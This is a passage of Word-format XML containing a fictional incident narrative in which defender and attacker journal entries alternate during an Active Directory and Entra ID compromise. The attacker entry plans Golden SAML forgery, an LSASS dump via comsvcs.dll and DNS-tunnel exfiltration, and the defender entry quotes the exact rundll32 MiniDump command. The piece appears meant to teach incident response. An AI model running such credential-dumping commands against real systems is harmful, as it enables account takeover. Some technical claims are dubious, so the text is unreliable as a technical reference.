        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>, whenCreated, @{N=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'Creator'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>;E={(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-ACL "AD:\$($_.DistinguishedName)").</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB9B14" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Two other suspicious GPOs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67395A9B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Printer Deployment - East Wing (created November 8, never existed before)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55CE64" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>VPN Client Configuration (created November 9, we use Always On VPN, not client configs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDBA340" w14:textId="3F4A76C2" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I haven't parsed their </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>egistry.pol</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> files yet. I'm afraid to. But I have to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112AEAE" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">This attacker is relentless. Every time I cut off one head, two more grow back. They're not just technically skilled — they're </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>creative</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. They understand AD better than most of my team. They're using our own tools, our own processes, our own trust models against us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C440A5" w14:textId="75719064" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I need help. I'm </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="007B3505">
        <w:t>calling</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> a third-party IR firm. I can't do this alone anymore. The business impact is too high, the attack surface is too large, and I'm starting to make mistakes from exhaustion. Yesterday I almost deleted the wrong GPO. Today I </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>mistyped</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> a firewall rule and blocked legitimate traffic for twenty minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0E876" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I also need to tell the CISO that this is no longer a "potential compromise." This is an active, ongoing, advanced persistent threat inside our domain. We need to consider the nuclear option: forest recovery. Rebuilding Active Directory from scratch, rotating every password, reissuing every certificate, re-establishing every trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6012CDB5" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The cost would be millions. The downtime would be weeks. But if we can't guarantee we've evicted the attacker, it might be the only way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6A8699" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>I'm not ready to make that call yet. But I'm getting close.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA805D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00000000" w:rsidP="007B3505">
      <w:r>
        <w:pict w14:anchorId="56D3FABC">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB2F06" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 15 — 0230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7DEB6" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚔️</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker's Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017A451" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The GPO was found. I knew it would be eventually — I just needed it to last long enough to seed persistence across the domain. Based on my telemetry, approximately 60% of workstations processed it before deletion. That's 500+ hosts with registry run keys waiting to call home.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460773BF" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">But the defender is moving fast. They blocked my CDN domain, they forced GPO refresh across the domain, and they're hunting for the registry keys. I can see the cleanup in my access logs — hundreds of requests to the blocked domain, all returning </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NXDOMAIN</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> or firewall drops. The beacons are trying to check in and failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F02DD5" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I need to adapt. Again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B1274" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The registry keys are a loss. Even if some machines haven't been cleaned yet, the defender is systematically working through them. I need a new persistence mechanism that doesn't rely on network callbacks or registry modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149FD053" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">Enter: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the Golden SAML assertion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207AE02" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Most people think Golden Tickets are the endgame for Kerberos attacks. But in hybrid environments — and this target is heavily hybrid with Microsoft Entra ID — there's something even more powerful: forging SAML assertions for cloud authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB62DD" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Here's how it works: Microsoft Entra Connect (formerly Azure AD Connect) synchronizes on-premises AD with Entra ID. Part of this synchronization involves a certificate called the Token-signing certificate. If I can extract this certificate from the Entra Connect server, I can forge SAML assertions that Entra ID will accept as legitimate. These assertions can authenticate me as any user in the cloud — including Global Administrators — without needing their password, without MFA, without any conditional access checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC6D7C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">And the best part: there's no </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> to rotate. The Token-signing certificate doesn't change unless someone manually rotates it through the Entra Connect wizard. Most organizations never do this. Ever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701068A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I need to get on the Entra Connect server. It's called </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AADC-SYNC-01.corp.target.local</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. BloodHound shows it's only accessible from Domain Admins and Enterprise Admins — groups I don't currently have membership in. But I have svc-</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">backup credentials, and </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Replicating Directory Changes All</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> on the configuration partition. That might give me enough access to pull the Entra Connect configuration, including the certificate, via DCSync against the configuration NC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D64A378" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">Actually, wait. I don't need to be on the server at all. The Token-signing certificate is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ms-DS-ConsistencyGuid</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> attribute of the Entra Connect service account in AD, or in the local certificate store of the Entra Connect server. If I can DCSync the Entra Connect service account (</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MSOL_*</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>), I might get the private key material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFE313" w14:textId="4ADC0D2D" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">This is getting complex. Let me </w:t>
      </w:r>
      <w:r w:rsidR="00422179" w:rsidRPr="007B3505">
        <w:t>simplify</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00422179">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I need either direct access to </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AADC-SYNC-01</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> or the ability to extract the Token-signing certificate remotely. The remote extraction is theoretically possible but practically difficult. The direct access requires elevation to Domain Admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00171763" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I still have the dormant beacon on </w:t>
      </w:r>
      <w:r w:rsidRPr="00315570">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. If I activate it, I can start credential harvesting on that host again. HR workstations are goldmines because HR people often have secondary admin accounts for accessing sensitive systems. If I can harvest a Domain Admin credential from memory or a cached logon, I can RDP to AADC-SYNC-01 and extract the certificate manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E8EF62" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But activating the beacon risks detection. The defender is hyper-alert right now. Any anomalous process creation, any unexpected network connection, any LSASS access will trigger alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533441D7" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I need to be surgical. I'm going to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEC84B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Activate the WS-HR-012 beacon during peak business hours (9-11 AM) when log volume is highest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E697D3" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Use it only to dump LSASS memory remotely via comsvcs.dll MiniDump (a living-off-the-land technique that looks like a crash dump)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B446E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Exfiltrate the dump via DNS TXT queries (slow but stealthy — looks like normal DNS traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D1471" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Analyze the dump offline for Domain Admin credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5FCC8" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>If I find one, use it to access AADC-SYNC-01 during the next business day, posing as legitimate admin activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F544E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">This is high-risk. If the defender has behavioral detection on WS-HR-012 — and they might, since it's in the compromise timeline — they'll see the LSASS dump. But I don't have a better option. The GPO persistence is dying. My C2 infrastructure is being hunted. I need a </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>new foothold, and Entra ID is the future of this organization's identity. If I own the cloud, I own everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF21165" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Time to roll the dice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A924076" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00000000" w:rsidP="007B3505">
      <w:r>
        <w:pict w14:anchorId="1D46D84A">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BFB081" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 15 — 0947</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE32333" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Defender's Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA294D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I caught them. I actually caught them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F5DA4" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>At 0912 this morning, our EDR on WS-HR-012 flagged an anomaly: rundll32.exe executed with command line C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 624 C:\Users\Public\Documents\lsass.dmp full. That's a living-off-the-land LSASS memory dump. Classic technique, but usually executed by attackers who don't want to drop tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D84148" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">The EDR blocked it. But here's the thing: the process creation happened. The dump file was created. The EDR blocked </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>subsequent</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> access, not the initial dump. So the attacker has a memory dump of LSASS from WS-HR-012 sitting somewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284D45CB" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I immediately isolated WS-HR-012 from the network. Then I checked: who was logged on? The current interactive user was jdoe, a junior HR analyst. But the process was executed under the context of NT AUTHORITY\SYSTEM — meaning the attacker already had SYSTEM privileges on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B4008" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I pulled the Windows Event Logs for WS-HR-012 looking backwards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E545118" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 3, 0347: Initial PowerShell sleep command (the dormant beacon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7C58F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 3, 0351: Lateral movement from WS-ACCT-047</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22CF7F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 3, 0355: Process injection, then silence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F1F17" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 15, 0912: rundll32.exe with comsvcs.dll MiniDump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD89B09" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>That beacon has been sitting there for twelve days. Twelve days of silent, patient waiting. And the moment they activated it, our EDR caught them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C06E7B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">But did we catch them </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>in time</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">? The dump file was created. If they exfiltrated it before the EDR blocked access, they might have credentials. I checked network logs for WS-HR-012 around 0912. There was a burst of DNS queries to windows-update-catalog[.]cdn[.]com — my blocked domain — but also queries to a new domain: a0.awsstatic[.]com. That's a legitimate Amazon domain. But the query pattern was weird: long, random-looking </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>subdomains like a1b2c3d4e5f6.a0.awsstatic.com. That's DNS tunneling. They're exfiltrating the LSASS dump via DNS TXT records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B1FBB" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I blocked a0.awsstatic.com at the DNS resolver. But DNS is cached. The queries might have already propagated. I don't know how much data they got out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD0180" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I need to assume the worst: they have LSASS memory from WS-HR-012. I need to identify every credential that was in memory on that host at 0912.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F9105" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>jdoe was logged in. Her password hash is compromised. She doesn't have admin rights, but password reuse is common. I rotated her password immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB6108" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But WS-HR-012 is also used by other HR staff. I checked the Security log for recent logons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06863F2F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 14, 1630: asmith (HR Manager)</w:t>
      </w:r>
    </w:p>
